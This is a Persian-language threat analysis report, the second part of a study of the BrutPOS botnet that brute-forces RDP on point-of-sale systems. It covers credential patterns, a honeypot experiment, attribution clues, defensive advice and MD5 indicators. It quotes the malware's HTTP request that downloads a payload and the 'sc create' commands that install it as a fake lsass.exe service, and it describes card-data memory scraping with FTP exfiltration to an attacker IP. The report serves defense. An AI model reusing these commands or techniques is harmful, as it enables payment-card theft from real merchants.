گزارش تحليلی بات‌نت BrutPOS (قسمت دوم)

گزارش تحليلی بات‌نت BrutPOS (قسمت دوم)

تاریخ ایجاد

IRCRE201407173
مهاجمان مي توانند نام هاي كاربري و كلمات عبوري را كه سيستم هاي آلوده براي حملات brute force روي سرورهاي RDP موجود استفاده مي كنند، تعيين كنند. برخي از نام هاي كاربري و كلمات عبور نشان مي دهد كه مهاجمين بدنبال برندهاي خاص سيستم هاي POS هستند( مانند Micros).
وقتي يك سيستم آلوده شده گزارش RDP login موفق را برمي گرداند، مهاجمان نام كاربري/ كلمه عبور و آدرس IP سرور RDP به علاوه سيستم آلوده اي كه از طريق آن brute force موفقي انجام داده است را نگه مي دارد.
از 60 سرور RDP "خوب" كه توسط مهاجمين ليست شده بود اكثريت آنها(51 عدد) در آمريكا قرار گرفته اند. معمول ترين نام كاربري "administrator" (36 عدد) و معمول ترين كلمه عبور "pos" (12 عدد) و "password" (12 عدد) بوده است.

سرقت از كارت پرداخت
طي بررسي ها، فايل اجرايي ديگري كشف گرديد كه روي سيستم ها اجرا مي شود و مي تواند اطلاعات ورود (كاربري/ كلمه عبور) را بدست آورد(4aed6a5897e9030f09f13f3c51668e92). اين مورد به منظور استخراج اطلاعات كارت پرداخت در فرآيندهاي درحال اجرا در نظر گرفته شده كه دو مسير كد مجزا، بسته به توانايي آن براي permission ديباگ با فراخواني RtlAdjustPrivilage(0×14,1,0…) دارد. اين مسئله ممكن است تلاش براي شناسايي پيكربندي POS باشد. در صورت موفقيت در ديباگ permission، فايل اجرايي، دانلود و اجرا مي شود:

GET /brut.loc/www/bin/1.exe HTTP/1.1
Accept-Encoding: gzip
Connection: Keep-Alive
Accept-Language: ru-RU,en,*
User-Agent: Browser
Host: x.x.x.x

اگر يك بدافزار نتواند permissionها را ديباگ كند، خودش را در %WINDIR%\lsass.exe كپي كرده و سپس خود را به عنوان سرويس نصب مي كند. اسكريپ ذيل براي ايجاد و شروع سرويس بكار مي رود.

sc create winservbinpath= C:\WINDOWS\lsass.exe type= own start= auto
sc start winserv
del 1.bat

وقتي به عنوان يك سرويس اجرا مي شود، برنامه، حافظه را براي همه فرآيندها بجز csrss.exeو conhost.exe جهت اطلاعات كارت پرداخت بلقوه اسكن مي كند. كانديدها با استفاده از Luhn checksum تاييد شده و در winsrv.sys ذخيره مي گردند. سپس winsrv.sys با استفاده ازسرويس FTP روي سرور 62.109.16.195 آپلود مي گردد.
قبل از اتصال به FTP سرور، سرويس نصب به smtp.gmail.com روي پورت 25 متصل شده و از روي پاسخ EHLO آدرس IP خارجي(external) قرباني را بدست مي آورد. winsrv.sys به سرور FTP با استفاده از نامي متشكل از كاراكترهاي بزرگ كه به آدرس IP منتهي مي شود، متصل مي گردد. كاراكتر بزرگ پيشوند با A شروع شده تا Z براي هر فايل جديد ادامه مي يابد. اگر آدرس IP از smtp.gmail.com بدست نيايد، يك شماره چهار رقمي رندوم ايجاد مي گردد.

عامل حمله
درحالي كه اطلاعات كافي براي تعيين عامل حمله وجود ندارد، برخي اطلاعات نشان مي دهد كه مهاجمين از اروپاي شرقي هستند، احتمالا روسيه و اوكراين. علاوه بر اينترفيس زبان روسي، بعد از ريكاوري لاگ هاي وب سرور، 6 آدرسIP كه از اينترفيس مديريتي استفاده مي گردند شناسايي گرديد.
دو مورد از اين آدرس هاي IP از PEOPLE-NET كه يك ISP در اوكراين هستند، مي باشد. در هر دو مورد، User-Agent نشان مي دهد كه درخواست ها از يك موبايل آلكاتل كه سيستم عامل آن اندرويد است، آمده است.

"Mozilla/5.0 (Linux; Android 4.1.1; ALCATEL ONE TOUCH 5020D Build/JRO03C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Mobile Safari/537.36 OPR/19.0.1340.69721"

آدرس IP ديگر از اوكراين از UKRTELNET-ADSL ISP مي باشد. كه در اين مورد User-Agent ، firefox بوده است.

"Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko/20100101 Firefox/30.0"

ارتباط ديگر از يك محدوده IP در روسيه بوده است كه به شبكه Macroregional_South در ولووگراد متعلق است.
به علاوه ارتباطي از فرانسه و انگلستان هم بوده است ولي اين ارتباطات با استفاده از سرورهاي VPN ، شركت هاي atomintersoft.com و vpnlux.netايجاد شده است.

استفاده از هاني پات
به منظور درك نيت مهاجمين، يك سرور Windows 2008 R2 با نرم افزار POS نصب گرديد و به هكرها اجازه داده شد تا آن را آلوده كنند. علاوه بر نرم افزار POS، يك سري مستندات مربوط به اطلاعات كارت هاي اعتباري جعلي روي صفحه دسكتاپ آن قرار داده شد. با تقليد از ترافيك توليد شده توسط سيستم هاي آلوده تحت كنترل مهاجمين، محققين توانستند نام كاربري و كلمه عبور كه تركيبي از كلمات "micro" و "admin" بود را به سرور كنترل و فرمان C2ارسال نمايند. سپس صبر كردند تا مهاجمين متصل گردند. مشاهده گرديد كه 27 دقيقه بعد از ارسال نام كاربري و كلمه عبور به C2 مهاجمين به سرور RDP نمونه متصل شدند. مهاجمين از 3 IP آدرس مختلف متصل شدند. يكي از آدرس IP در اوكراين از محدوده IP هاي PEOPLE-NET بود كه لاگ هاي آن در C2 مشاهده گرديد. IP ديگر از VPN از انگلستان و سومي از INETHN از هندوراس بود.
بعد از اتصال، مهاجمين فوراً مستندات حاوي اطلاعات كارت هاي اعتباري را باز كردند و پس از مدت كوتاهي از آن خارج شدند. دومين تلاش براي دسترسي، 4 دقيقه بعد با فعاليت كمي اتفاق افتاد. سومين دسترسي 18 دقيقه بعد اتفاق افتاد. مهاجمين در سومين دسترسي تلاش كردند تا نرم افزار POS را باز كنند كه ناموفق بود. در چهارمين دسترسي كه تنها دو دقيقه بعد اتفاق افتاد فعاليت كمي صورت گرفت. در پنجمين و آخرين دسترسي كه تقريباً 4 ساعت بعد اتفاق افتاد، مهاجمين درايو را فرمت كردند تا جزييات داده ها را از بين برده باشند.

نتيجه گيري
سيستم هاي POS در الويت بالايي براي حمله مجرمان اينترنتي هستند. تنها با يك حمله اسكن ساده، مهاجمين در اين مورد توانستند تا بيش از 5000 ماشين را در بات نت شان بكار ببرند تا در دو هفته به بيش از 60 سيستم دسترسي پيدا كنند.
درحالي كه بدافزارهاي جديد و حملات پيشرفته در حال وقوع است، حملات استاندارد و معمولي مانند كلمات عبور ضعيف و پيش فرض تهديد جدي براي ابزارهاي مديريت از راه دور بشمار مي روند.
بهترين راه محافظت سيستم هاي POS از اين بدافزار آن است كه مديران سيستم، رمزعبور هاي پيش فرض خود را تغييردهند. در ضمن پروتكل RDP (پروتكل دسكتاپ راه دور) كه بر روي پورت 3389 اجرا مي شود، بايستي تنها از سيستم ها مشخص و امن قابل دسترسي باشد. چون اين بدافزار به طور خاص از پروتكل RDP براي بدست آوردن دسترسي استفاده مي كند. بنابراين توجه كنيد كه دسترسي از طريق پورت 3389به ترمينال هاي POS از سيستم هاي غيرمديريتي اصلاً لازم نيست و دسترسي شبكه داخلي به آنها نيز بايستي كاملاً محدود گردد.

نمونه هاي بدافزارBrutPOS

  • 4c3d65c1d8e1d7a2815c0031be41efc7: BrutePOS_Brute
  • 7391ff6f34f79df0ec7571f7afbf8f7a: BrutePOS_Brute
  • 280d920531ba67d8fd81350877914985: BrutePOS_Brute
  • 96487eb38687e84405f045f7ad8a115c: BrutePOS_Brute
  • c1fab4a0b7f4404baf8eab4d58b1f821: BrutePOS_Brute
  • 6bcff459fbca8a64f1fd74be433e2450: BrutePOS_Brute
  • daae858fe34dcf263ef6230d887b111d: BrutePOS_Brute
  • 31bd8dd48ac0de3d4da340bf29f4d280: BrutePOS_Brute
  • 0f2266f63c06c0fee3ff999936c7c10a: BrutePOS_Brute
  • 4d4fd96fabb1c525eaeeae8f2652ffa6: BrutePOS_Brute
  • da6d727ddf096b6654406487bf22d26c: BrutePOS_Brute
  • fd58144a4cd354bfd09719ac2ccd3511: BrutePOS_Brute
  • e38e42f20e027389a86d6a5816a6d8f8: BrutePOS_Brute
  • 08863d484b1ebe6359144c9a8d8027c0: BrutePOS_Brute
  • 4ab3a6394a3a1860a6c52cf92d7f7560: BrutePOS_Brute
  • 0e58848506a525c755cb0dad397c1c44: BrutePOS_Brute
  • 60c16d8596063f6ee0eae579f201ae04: BrutePOS_Brute
  • b2d4fb4977630e68107ee87299a714e6: BrutePOS_Brute
  • 68ba1afd4585b9355cf7009f4604a208: BrutePOS_Brute
  • 9d3d769d3feea92fd4794fc3c59e32df: BrutePOS_Brute
  • b63581fcf0ff86bb771c3c33205c78ca: BrutePOS_Brute
  • 18eba6f28ab6c088d9fc22b4cc154a77: BrutePOS_Brute
  • 4802539350908fd447a5c3ae3e966be0: BrutePOS_Brute
  • cbbb68f6d8eda1071078a02fd79ed3ec: BrutePOS_Brute
  • 8ba3c7ccd0a61d5c9a8b94a71ce06328: BrutePOS_Brute
  • 9b8de98badede7f837a34e318b12d842: BrutePOS_Brute
  • 78f4a157db42321e8f61294bb39d7a74: BrutePOS_FTP_Exfil
  • f36889f30b62a7524bafc766ed78b329: BrutePOS_FTP_Exfil
  • 95b13cd79621931288bd8a8614c8483f: BrutePOS_FTP_Exfil
  • 4aed6a5897e9030f09f13f3c51668e92: BrutePOS_FTP_Exfil
  • 06d8d8e18b91f301ac3fe6fa45ab7b53: BrutePOS_FTP_Exfil
  • faddbf92ab35e7c3194af4e7a689897c: BrutePOS_FTP_Exfil

مطالب مرتبط:
گزارش تحليلی بات‌نت BrutPOS (قسمت اول)

برچسب‌ها
گزارشات تحلیلی
  • 6